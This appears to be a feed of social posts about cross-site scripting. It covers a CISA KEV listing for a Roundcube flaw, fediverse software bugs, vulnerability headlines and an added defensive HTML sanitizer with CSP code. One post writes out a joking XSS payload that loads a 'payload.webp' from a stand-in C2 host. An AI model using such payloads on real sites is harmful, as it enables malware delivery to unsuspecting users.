Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Why you should care about CVE-2023-43770:
ESET Research previously reported on 25 October 2023 that the Winter Vivern APT was exploiting a similar RoundCube cross-site scripting vulnerability CVE-2023-5631 as a zero-day against European governmental entities and a think tank.
#Sharkey's recent vulnerability and their handling of it is still miles better than #Lemmy's #XSS exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.
Like seriously, the first thing you do when #Markdown parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict #CSP for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals #Mastodon) using their software!
I can cut some slack for the Sharkey devs here because:
they're relatively new (only months since the project started)
it only affected note imports from #Twitter which is already niche enough
it was easy to mitigate (just disable note import)
it didn't affect single-user instances IIUC
I haven't seen any Sharkey instance get actually exploited by this
they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)
So this is not worth blowing over in the #fediverse. Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.
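As an added example, not code from Sharkey, Lemmy, or the poster, here is the defensive pattern the post describes: an allowlist sanitizer applied to the HTML that a Markdown renderer emits, together with a strict Content-Security-Policy header. It assumes the Markdown-to-HTML step is done by some renderer whose output is passed into sanitize_html(); the tag and attribute allowlists and the sample inputs are constructed for illustration.

```python
"""Allowlist HTML sanitizer for Markdown output, plus a strict CSP header.
Added example; assumes an upstream Markdown renderer produced the HTML."""
import re
import secrets
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlists: only harmless formatting tags and link/image attributes.
ALLOWED_TAGS = {"p", "br", "strong", "em", "code", "pre", "blockquote",
                "ul", "ol", "li", "h1", "h2", "h3", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" means a relative URL
VOID_TAGS = {"br", "img"}
DROP_CONTENT_TAGS = {"script", "style"}          # drop these and their contents


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized output fragments
        self.open_tags = []    # stack of kept tags, so output stays balanced
        self.drop_depth = 0    # > 0 while inside <script>/<style>

    @staticmethod
    def _safe_url(value):
        # Browsers ignore embedded tabs/newlines, so "java\tscript:" is still
        # javascript:. Strip ASCII controls and spaces before checking the scheme.
        cleaned = re.sub(r"[\x00-\x20]", "", value)
        return cleaned, urlparse(cleaned).scheme.lower() in SAFE_SCHEMES

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # every on* handler, style, etc. is discarded here
            if name in URL_ATTRS:
                value, ok = self._safe_url(value)
                if not ok:
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        if tag in self.open_tags:
            while self.open_tags:          # close anything left open inside it
                top = self.open_tags.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))  # re-escape all text

    def result(self):
        while self.open_tags:              # close tags the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_html(rendered_html):
    """Return an allowlisted, re-serialized version of renderer output."""
    s = Sanitizer()
    s.feed(rendered_html)
    s.close()
    return s.result()


def strict_csp_header(nonce):
    """Strict CSP for a page showing user Markdown: no inline or injected
    scripts run unless tagged with the per-response nonce."""
    return {"Content-Security-Policy":
            f"default-src 'self'; script-src 'nonce-{nonce}' 'strict-dynamic'; "
            "object-src 'none'; base-uri 'none'; img-src 'self' https:; "
            "style-src 'self'; frame-ancestors 'none'"}


if __name__ == "__main__":
    # Constructed sample of hostile renderer output.
    sample = '<p>hi <script>alert(1)</script><img src="x" onerror="prompt(8)"></p>'
    print(sanitize_html(sample))
    print(strict_csp_header(secrets.token_urlsafe(16)))
```

The sanitizer is the second of the two layers the post names (the first being restrictions on the Markdown input itself), and the CSP is the backstop for whatever both layers miss: with a nonce-only script-src, an injected inline handler or script tag does not execute even if it reaches the page.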
A blog is something personal, and theming it just right is a challenge. You'll surely have noticed that the theme of Alien Pastures has been changed overnight.
This blog started out with a theme by Andreas Viklund (wp-andreas01) but that did not scale well on mobile devices, also it did weird stuff with user comments. I liked its v
Development platform: New GitLab versions fix ten security vulnerabilities
Besides cross-site scripting and permission problems, the new versions of the version control system also fix DoS vulnerabilities. The GitLab team recommends updating.
Security researchers find critical bugs in the AI tools Ray, MLflow and H2O
The popular tools for AI applications suffer from code injection, illegitimate file manipulation and other bugs. Updates are not always available.
Severe security vulnerabilities in the monitoring software Zabbix fixed
Critical security vulnerabilities in various components of the Zabbix monitoring software allowed attackers to execute their own code.
I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol
Prevention: add the .webp extension to uBlock Origin custom rules or block it at the DNS level.
Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser
@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.
Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?
Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.
#Bitwarden, like most cloud-based password managers, has a web vault. Imagine a stored #XSS on that. All your passwords stolen.
Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.